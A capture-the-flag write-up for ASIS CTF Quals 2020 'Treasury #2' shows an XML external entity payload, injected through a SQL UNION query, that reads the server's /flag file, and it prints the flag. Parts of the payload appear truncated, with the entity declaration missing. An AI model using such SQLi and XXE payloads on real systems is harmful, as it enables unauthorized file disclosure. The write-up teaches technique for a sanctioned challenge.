Tags: sqli web xxe

Rating:

## Treasury #2
Before going forward, make sure to read the solution of Treasury #1 since this part is pretty easy and just uses what we gathered in the first part.

### XXE
That being said, it is now obvious that we need to read the contents of /flag.
> Just if I could read files :(

Oh yes we can... XML provides us with the great feature of loading external resources using DocType Definitions (DTD), and this falls in the range of **XXE attacks** (XML eXternal Entity).

Here is the XML we'll be injecting to read the contents of /flag :
xml

]>
<root>
<excerpt>&flag;</excerpt>
</root>

As you can see, we use a DOCTYPE definition and define flag as an entity that reads the /flag file, so when we issue &flag; in the excerpt tag, it will replace the flag "variable" with the contents of /flag. Let's see :
- **Query payload:** ' UNION SELECT ']><root><excerpt>&flag;</excerpt></root>
- **Explanation:** nothing much to explain, we just inject the XML in the UNION query
- **Response:** ASIS{03482b1821398ccb5214d891aed35dc87d3a77b2}, we get the second **flag** as expected, **very COOL**.

Original writeup (https://github.com/malikDaCoda/CTFs-writeups/tree/master/web/ASIS%20CTF%20Quals%202020-Treasury).